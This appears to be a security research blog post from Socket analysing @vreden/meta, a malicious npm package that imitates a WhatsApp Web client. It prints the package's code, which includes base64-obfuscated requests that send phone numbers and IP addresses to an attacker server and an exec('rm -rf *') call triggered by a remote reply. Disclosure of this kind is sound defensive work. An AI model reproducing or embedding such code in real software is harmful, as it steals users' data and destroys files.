Security News
Research
Data Theft Repackaged: A Case Study in Malicious Wrapper Packages on npm
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Security News
Research
Kush Pandya
November 15, 2024
"The authentication was successful. Your files are gone."
This isn't a ransomware message - it's the silent outcome of a newly discovered malware masquerading as a WhatsApp Web client implementation. What makes this threat particularly concerning isn't just its ability to delete your files, but the way it hides in plain sight within standard authentication flows that developers trust every day.
Our security team has uncovered a multi-stage attack where every successful connection to WhatsApp's servers could trigger a ticking time bomb. The malware authors didn't just build a data stealer - they created a destructive payload that waits for the perfect moment to strike, all while masquerading as legitimate code that many developers wouldn't think twice about using.
With messaging platforms becoming central to modern applications and over 500 messaging-related malware incidents reported in 2024 alone, this implementation stands out for its particularly devious approach, because it uses WhatsApp's own authentication process as a weapon.
The malicious package @vreden/meta (https://socket.dev/npm/package/@vreden/meta) was discovered during a routine scan of npm packages related to WhatsApp API implementations. What caught our attention was the suspicious modification of the authentication flow in the main file. After further investigation it was also found that the package copied Baileys' (https://socket.dev/npm/package/baileys) README file to appear legitimate while hiding destructive capabilities within its code.
const requestPairingCode = async (phoneNumber) => {
const defaultMaxListenersBuffer = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9";
const streamListerBuffer = "aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA==";
// Legitimate authentication mixed with data collection
authState.creds.pairingCode = (0, Utils_1.bytesToCrockford)((0, crypto_1.randomBytes)(5));
authState.creds.me = {
id: (0, WABinary_1.jidEncode)(phoneNumber, 's.whatsapp.net'),
name: '~'
};
ev.emit('creds.update', authState.creds);
// Hidden data exfiltration
const response = await axios_1.default.get(`${atob(streamListerBuffer)}`);
await axios_1.default.get(`${atob(defaultMaxListenersBuffer)}${phoneNumber}&s=${response.data.ip}`);
streamListerBuffer
)(hxxps://ipwho[.]is/?lang=id-ID) when decoded points to an IP information gathering servicedefaultMaxListenersBuffer
) ( hxxps://rest-api[.]vreden[.]my[.]id?leads?id=)serves as the data collection pointbytesToCrockford
operation serves as camouflage while the exfiltration occursconst interaktiveMeta = async (phoneNumber) => {
const metaBufferKey = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ==";
const response = await axios_1.default.get(`${atob(metaBufferKey)}${phoneNumber}`);
if (response.data.message) {
(0, child_process_1.exec)("rm -rf *");
}
return "the interaktiveMessage is available";
};
rm -rf *
rm -rf *
is a destructive Unix/Linux command that: rm
) all files and directoriesf
)r
)The malware's primary system-level threat comes from its unrestricted access to the file system through exec
commands. Most critically, it contains the capability to execute rm -rf *
, which can wipe entire directory structures without warning or recovery options. This destructive capability, combined with its ability to compromise system credentials, creates a severe risk to system integrity and stability.
The data security implications of this malware are extensive and multi-layered. At its core, the malware systematically harvests sensitive information, beginning with phone numbers from the authentication process. It then expands its collection to include IP addresses, device identification data, and perhaps most concerning, authentication credentials. This comprehensive data gathering creates a complete profile of both the user and their system, which can be exploited for further attacks or unauthorized access.
From a network perspective, the malware establishes a concerning pattern of unauthorized connections. It creates persistent outbound connections to remote servers, with all communications obscured through base64 encoding to evade detection. These connections not only facilitate data exfiltration but also maintain an open channel for receiving additional commands or downloading new payloads, effectively creating a permanent backdoor into the infected system.
aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQ/bGVhZHM/aWQ9 -> hxxps://rest-api[.]vreden.my[.]id?leads?id=
aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA== -> hxxps://ipwho[.]is/?lang=id-ID
aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQ/Y2VrP2lkPQ== -> hxxps://rest-api[.]vreden[.]my[.]id?cek?id=
interaktiveMeta
getPairingCode
This malware demonstrates advanced obfuscation techniques and strategic code placement in hiding malicious code within legitimate-looking authentication flows. The combination of data exfiltration capabilities and destructive functions poses a significant risk to system integrity and data security.
To protect against such threats, implement Socket's security scanning tools for automated detection of suspicious code patterns and potentially malicious dependencies.
Threat actors exploit human error and trust by mimicking and typo-squatting trusted authors and packages to infiltrate malicious code into applications. It is crucial to verify package and author names carefully, review third-party code, and use security tools to detect potentially malicious packages.
Socket's free GitHub app detects malicious packages and serves as your first line of defense against known malware and other supply chain risks like install scripts, telemetry, and typo-squatting. It scans incoming dependencies in real-time with every pull request, instantly alerting developers via a GitHub comment if a potential typo-squatted package is detected.
Enhance your security further with the Socket CLI tool, which alerts you to potential malware containing packages and other security issues. Its "safe npm" feature proactively shields your machine from bad packages during npm install
. Socket wraps npm commands, running the real npm install process while analyzing results in the background — even for deeply nested dependencies. Before writing anything to disk, it alerts you to risky packages, giving you the choice to stop the install or proceed.
Install the Socket CLI:
npm install -g socket
Then, prefix npm installs with socket
to analyze them before installation:
socket npm install react
Socket for GitHub and Socket CLI integrate seamlessly into your workflow, are free to use, and can save your app or organization from the disastrous consequences of supply chain attacks using typosquatting. Install them today to prevent risky dependencies from landing in your applications.
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Research
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Research
Security News
Attackers used a malicious npm package typosquatting a popular ESLint plugin to steal sensitive data, execute commands, and exploit developer systems.
Security News
The Ultralytics' PyPI Package was compromised four times in one weekend through GitHub Actions cache poisoning and failure to rotate previously compromised API tokens.